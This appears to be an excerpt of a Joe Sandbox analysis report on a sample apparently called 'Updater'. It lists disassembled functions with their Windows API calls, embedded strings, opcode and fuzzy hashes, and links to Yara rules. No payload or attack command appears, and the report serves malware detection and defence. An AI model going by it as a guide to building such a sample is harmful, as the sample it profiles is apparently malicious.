Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
String ID: @GUI_DRAGFILE$@GUI_DROPID$P3z$P3z
API String ID: 1924731296-392432706
Opcode ID: 7efbf2b348f458b1b2cb0ddb4b9520a95104ab919af255eab04ef377dad739bd
Instruction ID: 576bba87c5487493d376bbd551cacd13929b028744e2fc4f2d789bb6dc3920bd
Opcode Fuzzy Hash: 7efbf2b348f458b1b2cb0ddb4b9520a95104ab919af255eab04ef377dad739bd
Instruction Fuzzy Hash: 1251BC70604304AFD714DF24C896F6A77E5FB88700F008A2EFA56972E2DB79AD05CB56

Function 0073A4B0 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 138windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,00000FFF,?,00000000,?,?,00726680,?,0000138C,?,?,?,?,0074EFB0,?), ref: 0073A4E5
LoadStringW.USER32(00000000,?,00726680,?), ref: 0073A4EE

Part of subcall function 006DFA3B: _wcslen.LIBCMT ref: 006DFA45

GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,?,00726680,?,0000138C,?,?,?,?,0074EFB0,?,?), ref: 0073A510
LoadStringW.USER32(00000000,?,00726680,?), ref: 0073A513
MessageBoxW.USER32(00000000,?,?,00011010), ref: 0073A634

Strings

Line %d:, xrefs: 0073A56E
%s (%d) : ==> %s: %s %s, xrefs: 0073A618
Error: , xrefs: 0073A5EB
Line %d (File "%s"):, xrefs: 0073A55D
^ ERROR, xrefs: 0073A5C9

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: HandleLoadModuleString$Message_wcslen
String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
API String ID: 747408836-2268648507
Opcode ID: 1ccc80bb478f12540caff1b71006ee28412e8d811248e12e17a184ad0b59e945
Instruction ID: 460e1d0b243cd9bbef641c92e63d152073f31216551a3bac099f1538dffe76b8
Opcode Fuzzy Hash: 1ccc80bb478f12540caff1b71006ee28412e8d811248e12e17a184ad0b59e945
Instruction Fuzzy Hash: 3B415072C0020DBADF04EBE0DD96DEE777AAF18340F10406AF506721A2DA396F49CB65

Function 00764951 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON

Download Yara Rule

APIs

MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 007649F4
CreateCompatibleDC.GDI32(00000000), ref: 007649FB
SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00764A0E
SelectObject.GDI32(00000000,00000000), ref: 00764A16
GetPixel.GDI32(00000000,00000000,00000000), ref: 00764A21
DeleteDC.GDI32(00000000), ref: 00764A2B
GetWindowLongW.USER32(?,000000EC), ref: 00764A35
SetLayeredWindowAttributes.USER32(?,?,00000000,00000001,?,00000000,?), ref: 00764A4B
DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?), ref: 00764A57

Strings

static, xrefs: 0076498C

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
String ID: static
API String ID: 2559357485-2160076837
Opcode ID: 869b8e4b821485a0e7af4847d3b3ea91e2b07bec8c7d7a299f4b32dccf11a39c
Instruction ID: 85e0e5561d26f12abe17c79d01ed98a6f441763d787ee5cd4ea457766d96fad1
Opcode Fuzzy Hash: 869b8e4b821485a0e7af4847d3b3ea91e2b07bec8c7d7a299f4b32dccf11a39c
Instruction Fuzzy Hash: 61317E31550219BBDF219FA4DC08FDB3BA9FF09314F118215FA66A60A0D779DC10DB98

Function 0073291D Relevance: 17.5, APIs: 9, Strings: 1, Instructions: 49memorythreadCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,00732557,?,?,00000000), ref: 00732926
HeapAlloc.KERNEL32(00000000,?,00732557,?,?,00000000), ref: 0073292D
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00732557,?,?,00000000), ref: 00732942
GetCurrentProcess.KERNEL32(?,00000000,?,00732557,?,?,00000000), ref: 0073294A
DuplicateHandle.KERNEL32(00000000,?,00732557,?,?,00000000), ref: 0073294D
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00732557,?,?,00000000), ref: 0073295D
GetCurrentProcess.KERNEL32(W%s,00000000,?,00732557,?,?,00000000), ref: 00732965
DuplicateHandle.KERNEL32(00000000,?,00732557,?,?,00000000), ref: 00732968
CreateThread.KERNEL32(00000000,00000000,0073298E,00000000,00000000,00000000), ref: 00732982

Strings

W%s, xrefs: 00732960, 00732963

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
String ID: W%s
API String ID: 1957940570-3075281222
Opcode ID: 77f895f54aedcc203d2dbb35d5b42cd0277a81dcafa1f349081d54b7717578b2
Instruction ID: 4a8a556151ef0fb870c423f2d79f74e60bcfb10aa46a41bbee8abaabd5cf0969
Opcode Fuzzy Hash: 77f895f54aedcc203d2dbb35d5b42cd0277a81dcafa1f349081d54b7717578b2
Instruction Fuzzy Hash: 8A01BBB5750348BFE720ABA5DC4DF6B7BACEB89711F018411FA05DB2A1CAB59C00CB65

Function 0074854F Relevance: 16.8, APIs: 11, Instructions: 299comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 007485AC
SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00748648
SHGetDesktopFolder.SHELL32(?), ref: 0074865C
CoCreateInstance.OLE32(00770CBC,00000000,00000001,00797C9C,?), ref: 007486A8
SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 0074872D
CoTaskMemFree.OLE32(?), ref: 00748785
SHBrowseForFolderW.SHELL32(?), ref: 00748810
SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00748833
CoTaskMemFree.OLE32(00000000), ref: 0074883A
CoTaskMemFree.OLE32(00000000), ref: 0074888F
CoUninitialize.OLE32 ref: 00748895

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
String ID:
API String ID: 2762341140-0
Opcode ID: 7b2ac1ccf9922be20abb6126231a6c7c870d6a63020944b368a5962c377c2115
Instruction ID: 0d4785a12e125f6651da6eedb3c824d5c603f94d825f19e767d86abfcf3b3c66
Opcode Fuzzy Hash: 7b2ac1ccf9922be20abb6126231a6c7c870d6a63020944b368a5962c377c2115
Instruction Fuzzy Hash: 36C13D75A00209EFCB54DFA4C884DAEBBB9FF48304B148099E516DB362DB35EE41CB95

Function 00730B44 Relevance: 16.6, APIs: 11, Instructions: 127memoryCOMMON

Download Yara Rule

APIs

SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00730B6B
SafeArrayAllocData.OLEAUT32(?), ref: 00730BCD
VariantInit.OLEAUT32(?), ref: 00730BDF
SafeArrayAccessData.OLEAUT32(?,?), ref: 00730BFF
VariantCopy.OLEAUT32(?,?), ref: 00730C52
SafeArrayUnaccessData.OLEAUT32(?), ref: 00730C66
VariantClear.OLEAUT32(?), ref: 00730C7B
SafeArrayDestroyData.OLEAUT32(?), ref: 00730C88
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00730C91
VariantClear.OLEAUT32(?), ref: 00730CA3
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00730CAE

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
String ID:
API String ID: 2706829360-0
Opcode ID: 95d479f2950642001d36f804ac85e706079fd3d4517845e6b49b7717b27ad37b
Instruction ID: 09270c843d186359dbeb36b0d5a6041b0adeeec662a87c3e213d09eacc1cb539
Opcode Fuzzy Hash: 95d479f2950642001d36f804ac85e706079fd3d4517845e6b49b7717b27ad37b
Instruction Fuzzy Hash: 99415E75E00219DFDB10DF94C8589EEBBB9FF48314F008059E952A7262CB78AD45CBA4

Function 007488AB Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 235COMMON

Download Yara Rule

APIs

GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00748A68
SetCurrentDirectoryW.KERNEL32(?), ref: 00748A7C
GetFileAttributesW.KERNEL32(?), ref: 00748A9B
GetFileAttributesW.KERNEL32(?), ref: 00748AB3
SetFileAttributesW.KERNEL32(?,00000000), ref: 00748AC9
SetCurrentDirectoryW.KERNEL32(?), ref: 00748ADB
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00748B27
SetCurrentDirectoryW.KERNEL32(?), ref: 00748B30

Strings

*.*, xrefs: 00748B36

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: CurrentDirectory$AttributesFile
String ID: *.*
API String ID: 769691225-438819550
Opcode ID: 8f03640b4aecbbf6b0f23bef5886a16b755bd097475b559bca9e4fd5721a9ce1
Instruction ID: 2883164eae5e51b838c1302634023a84ff12bcd7ca198505fead8042a400c4d3
Opcode Fuzzy Hash: 8f03640b4aecbbf6b0f23bef5886a16b755bd097475b559bca9e4fd5721a9ce1
Instruction Fuzzy Hash: CD81B2B1A046499FCBA0EF54C844A7EB3E9BF89310F14881EF995CB250DB78E945CB53

Function 00751125 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 207networkfileCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 00751186
inet_addr.WSOCK32(?), ref: 007511E6
gethostbyname.WSOCK32(?), ref: 007511F2
IcmpCreateFile.IPHLPAPI ref: 00751200
IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00751290
IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 007512AF
IcmpCloseHandle.IPHLPAPI(?), ref: 00751383
WSACleanup.WSOCK32 ref: 00751389

Strings

Ping, xrefs: 00751240

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
String ID: Ping
API String ID: 1028309954-2246546115
Opcode ID: f78f15ba928ab9a091056fe2618f5524794fc7da33848260e6d0ae5279eba25e
Instruction ID: 735f93bc2c8ed073e92e4426265d4a72d3acd26ab6b41de661409bf7cf10f640
Opcode Fuzzy Hash: f78f15ba928ab9a091056fe2618f5524794fc7da33848260e6d0ae5279eba25e
Instruction Fuzzy Hash: C791B470604201DFD320DF15C498F5ABBE1BF45319F458599F8698BBA2C7B8ED45CB81

Function 007542A7 Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 202comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 007542F1
CoUninitialize.OLE32 ref: 007542FB
CoCreateInstance.OLE32(?,00000000,00000017,00770B2C,?), ref: 00754367
IIDFromString.OLE32(00000000,?), ref: 007543D8
VariantInit.OLEAUT32(?), ref: 0075447B
VariantClear.OLEAUT32(?), ref: 007544CD

Strings

Invalid parameter, xrefs: 007543F1
NULL Pointer assignment, xrefs: 007543A7
Failed to create object, xrefs: 00754372, 00754426

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
API String ID: 636576611-1287834457
Opcode ID: d6d4bd25d9bc4f7e8df15e344a74317e78fc3b306245d5f873717936768729fa
Instruction ID: 11edb8dff248a79b82536feec79ef144edb7dd83c165309e0fff896812e1e84c
Opcode Fuzzy Hash: d6d4bd25d9bc4f7e8df15e344a74317e78fc3b306245d5f873717936768729fa
Instruction Fuzzy Hash: 3871AC70608341DFC720DF54C888BAABBE4EF4975AF404449FD85AB261C7B8ED88CB56

Function 007596F4 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 158COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,00000000,00000000,?), ref: 00759716

Part of subcall function 00739D33: _wcslen.LIBCMT ref: 00739D56

_wcslen.LIBCMT ref: 00759770
_wcslen.LIBCMT ref: 007597B4
_wcslen.LIBCMT ref: 007597EF
_wcslen.LIBCMT ref: 00759872

Strings

cdecl, xrefs: 0075976B, 00759784
winapi, xrefs: 007597AF, 007597C2
none, xrefs: 0075986D, 0075987E
stdcall, xrefs: 007597EA, 007597FF

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: _wcslen$BuffCharLower
String ID: cdecl$none$stdcall$winapi
API String ID: 707087890-567219261
Opcode ID: bd20fd4da238daa84fd88262f05ce2e8f8c08ae408aded02f29689eda1fca7d6
Instruction ID: afc02a230a98c0993337348c857266572e6b673bd7d672f5f691104ef450b24a
Opcode Fuzzy Hash: bd20fd4da238daa84fd88262f05ce2e8f8c08ae408aded02f29689eda1fca7d6
Instruction Fuzzy Hash: 8F510675A00105DBCF149F28C8415FE73A6EF96311F14862DEE2687395EEB6EC09C791

Function 00744142 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 150COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF), ref: 00744189

Part of subcall function 006DFA3B: _wcslen.LIBCMT ref: 006DFA45

LoadStringW.USER32(00000072,?,00000FFF,?), ref: 007441AA

Strings

"%s" (%d) : ==> %s:, xrefs: 007442DC
Incorrect parameters to object property !, xrefs: 00744265
"%s" (%d) : ==> %s:%s%s, xrefs: 007442BE
Error: , xrefs: 0074428B
Line %d (File "%s"):, xrefs: 007441FD, 00744216
^ ERROR , xrefs: 00744258

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: LoadString$_wcslen
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
API String ID: 4099089115-3080491070
Opcode ID: 751c4aafb1f5be5a18cf76928ac5c7e35682f8f9a7a69be9c1d95fd21adfd58d
Instruction ID: d204709fbe9de226a00dafb26d5f4f1f9ae20733831a4cc7529a8d817d6dcb82
Opcode Fuzzy Hash: 751c4aafb1f5be5a18cf76928ac5c7e35682f8f9a7a69be9c1d95fd21adfd58d
Instruction Fuzzy Hash: E6519371D00209BADF14EBE0DD86EEEB77AAF18300F10416AF50672162DB782F59DB55

Function 0073C439 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 107COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 0073C46E
_wcslen.LIBCMT ref: 0073C479
_wcslen.LIBCMT ref: 0073C4B4
_wcslen.LIBCMT ref: 0073C4E7
_wcslen.LIBCMT ref: 0073C521

Strings

APPEND, xrefs: 0073C51C, 0073C52D
KEYS, xrefs: 0073C4AF, 0073C4C2
EXISTS, xrefs: 0073C4E2, 0073C4F5
REMOVE, xrefs: 0073C474, 0073C487

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: _wcslen$BuffCharUpper
String ID: APPEND$EXISTS$KEYS$REMOVE
API String ID: 1256254125-769500911
Opcode ID: b1f18ba8a958b385e8db18730bf68b8766c698625667dece3e1fe15c60743139
Instruction ID: fce730318971bdb8a8ad55e487b73988403e9965b3813bde9d94513b4d202f1a
Opcode Fuzzy Hash: b1f18ba8a958b385e8db18730bf68b8766c698625667dece3e1fe15c60743139
Instruction Fuzzy Hash: 99316776F0412147EF655B7C88414BA7766EB61300F34803EED07AB306FA39AC22C742

Function 007645EF Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 103windowCOMMON

Download Yara Rule

APIs

CreateMenu.USER32 ref: 00764622
SetMenu.USER32(?,00000000), ref: 00764631
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 007646BE
IsMenu.USER32(?), ref: 007646D2
CreatePopupMenu.USER32 ref: 007646DC
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00764709
DrawMenuBar.USER32 ref: 00764711

Strings

F, xrefs: 007646FD
0, xrefs: 007645FD

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: Menu$CreateItem$DrawInfoInsertPopup
String ID: 0$F
API String ID: 161812096-3044882817
Opcode ID: f0063afc4fdb7b4d547f7eb395fb668d8863279056abb5ff6d926cc5cf1b0841
Instruction ID: 9a2faac0e5953cd0ea701530e4cbdedc836b6d5b2b0524b2c364f1c0c028e972
Opcode Fuzzy Hash: f0063afc4fdb7b4d547f7eb395fb668d8863279056abb5ff6d926cc5cf1b0841
Instruction Fuzzy Hash: 2D417A78A01309EFDB24CFA4E884AAA7BB5FF4A314F144029FD46A7351C779AD20CB54

Function 00732F90 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 79windowCOMMON

Download Yara Rule

APIs

Part of subcall function 006DFA3B: _wcslen.LIBCMT ref: 006DFA45

Part of subcall function 00734D36: GetClassNameW.USER32(?,?,000000FF), ref: 00734D59

SendMessageW.USER32(?,0000018C,000000FF,00020000), ref: 00733015
GetDlgCtrlID.USER32 ref: 00733020
GetParent.USER32 ref: 0073303C
SendMessageW.USER32(00000000,?,00000111,?), ref: 0073303F
GetDlgCtrlID.USER32(?), ref: 00733048
GetParent.USER32(?), ref: 0073305C
SendMessageW.USER32(00000000,?,00000111,?), ref: 0073305F

Strings

ComboBox, xrefs: 00732F9D
ListBox, xrefs: 00732FD2

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: MessageSend$CtrlParent$ClassName_wcslen
String ID: ComboBox$ListBox
API String ID: 711023334-1403004172
Opcode ID: d32c1923c211f1009216995b9429d161394ef795dfb5db8378b06bbb2d5d6aa1
Instruction ID: 8acc547bdd0e39e9d492d0d86d00969287914fe139898a845ea00efc603c3fa7
Opcode Fuzzy Hash: d32c1923c211f1009216995b9429d161394ef795dfb5db8378b06bbb2d5d6aa1
Instruction Fuzzy Hash: 7721F570E00218FBDF24EBA0CC85EFEBB7AEF05350F00421AF956532A2DA795915DB64

Function 00733073 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 78windowCOMMON

Download Yara Rule

APIs

Part of subcall function 006DFA3B: _wcslen.LIBCMT ref: 006DFA45

Part of subcall function 00734D36: GetClassNameW.USER32(?,?,000000FF), ref: 00734D59

SendMessageW.USER32(?,00000186,00020000,00000000), ref: 007330F6
GetDlgCtrlID.USER32 ref: 00733101
GetParent.USER32 ref: 0073311D
SendMessageW.USER32(00000000,?,00000111,?), ref: 00733120
GetDlgCtrlID.USER32(?), ref: 00733129
GetParent.USER32(?), ref: 0073313D
SendMessageW.USER32(00000000,?,00000111,?), ref: 00733140

Strings

ComboBox, xrefs: 00733080
ListBox, xrefs: 007330B5

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: MessageSend$CtrlParent$ClassName_wcslen
String ID: ComboBox$ListBox
API String ID: 711023334-1403004172
Opcode ID: d175ad6a904b7fbda51f0aa399e7df9d1ee8dc3f1f2715b3d46e3d52d98b1889
Instruction ID: b3970d25afc8323d6460d6a43f0bb9e7f3e17c03b941143eebbab019e0d02d82
Opcode Fuzzy Hash: d175ad6a904b7fbda51f0aa399e7df9d1ee8dc3f1f2715b3d46e3d52d98b1889
Instruction Fuzzy Hash: 0421D770E00218FBDF20EFA0CC85EEEBB79EF05350F004156F956532A2DA795918DB64

Function 007643BD Relevance: 15.2, APIs: 10, Instructions: 185windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 0076443F
